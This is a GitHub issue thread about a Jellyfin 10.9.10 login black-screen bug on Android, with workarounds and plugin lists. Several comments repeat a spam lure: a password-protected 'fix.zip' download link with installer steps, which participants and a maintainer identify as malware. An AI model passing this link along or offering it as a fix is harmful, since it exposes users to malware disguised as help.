### ISSUE TITLE
with jellyfin10.9.10 server and android 2.6.2 was unable to login, with blackscreen

### ISSUE THREAD

**Issue by Zachwang007** [jellyfin/jellyfin#12517]
### This issue respects the following points:

- [X] This is a **bug**, not a question or a configuration issue; Please visit our forum or chat rooms first to troubleshoot with volunteers, before creating a report. The links can be found [here](https://jellyfin.org/contact/).
- [X] This issue is **not** already reported on [GitHub](https://github.com/jellyfin/jellyfin/issues?q=is%3Aopen+is%3Aissue) _(I've searched it)_.
- [X] I'm using an up to date version of Jellyfin Server stable, unstable or master; We generally do not support previous older versions. If possible, please update to the latest version before opening an issue.
- [X] I agree to follow Jellyfin's [Code of Conduct](https://jellyfin.org/docs/general/community-standards.html#code-of-conduct).
- [X] This report addresses only a single issue; If you encounter multiple issues, kindly create separate reports for each one.

### Description of the bug

with jellyfin10.9.10 server and android 2.6.2 was unable to login, with blackscreen

### Reproduction steps

server is jellyfin 10.9.10 
and open android 2.6.2 on mobile 
try to login in ,but failed with blackscreen 
but back to jellyfin 10.9.9 is working normally

### What is the current _bug_ behavior?

server is jellyfin 10.9.10 
and open android 2.6.2 on mobile 
try to login in ,but failed with blackscreen 

### What is the expected _correct_ behavior?

should be normally login in 

### Jellyfin Server version

10.9.9+

### Specify the build version

10.9.10

### Environment

```markdown
- OS:unraid 
- Linux Kernel:	Linux 6.1.106-Unraid x86_64
- Virtualization: docker
- Clients:xiaomi 13 android 
- Browser:chrome
- FFmpeg Version:no 
- Playback Method:no 
- Hardware Acceleration: yes 
- GPU Model:Intel® UHD Graphics 730
- Plugins: many
- Reverse Proxy: no
- Base URL: 
- Networking:  
- Storage:
```

### Jellyfin logs

```shell
no log can be seen
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zachwang007** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

what this about？

**Comment by Strit** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> what this about？

Probably a virus or malware. Don't download and/or open.

**Comment by Zachwang007** [comment]
> > > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> > 
> > 
> > what this about？
> 
> Probably a virus or malware. Don't download and/or open.

got it

**Comment by nielsvanvelzen** [comment]
Note: I've deleted multiple messages because they contained a download link to malware (including the replies that quoted it). Please do not trust any link you find on the internet.

**Comment by Liquoriced** [comment]
Yep, I can confirm that Jellyfin for Android pretty much died with the server update to 10.9.10

**Comment by cflorell** [comment]
Stumbled upon this error as what is described above. Similar to discussion for https://github.com/jellyfin/jellyfin-android/issues/1417 I could solve the issue by clearing the Jellyfin android app's cache.

**Comment by Zachwang007** [comment]
> Stumbled upon this error as what is described above. Similar to discussion for https://github.com/jellyfin/jellyfin-android/issues/1417 I could solve the issue by clearing the Jellyfin android app's cache.

i tried many times and even uninstall,it's not working

**Comment by loof2736** [comment]
Is this only with the Jellyfin app, or the website as well? I've been having an intermittent issue where the website is just a blank page after a restart. This is affecting all browsers, along with the jellyfin app on Android (Which is basically just the website)

**Comment by felix920506** [comment]
Please provide a complete list of plugins

**Comment by viggy96** [comment]
I have the same issue, Jellyfin 10.9.11, when trying to access via the browser or Jellyfin Media Player. The Jellyfin Android app appears to work correctly. I've tried clearing cache and site data, along with deleting everything in `~/.var/app/com.github.iwalton.jellyfinmediaplayer` for Jellyfin Media Player.

**Comment by viggy96** [comment]
I have the following plugins installed:
- AniDB
- AudioDB
- Bookshelft
- Cover art archive
- Fanart
- InfuseSync
- Introskipper
- Jellyscrub
- LDAP-Auth
- Musicbrainz
- OMDb
- Playback reporting
- Reports
- Session cleaner
- Studio Images
- TMDb
- TMDb box sets
- TheTVDb
- Trakt
- Webhook
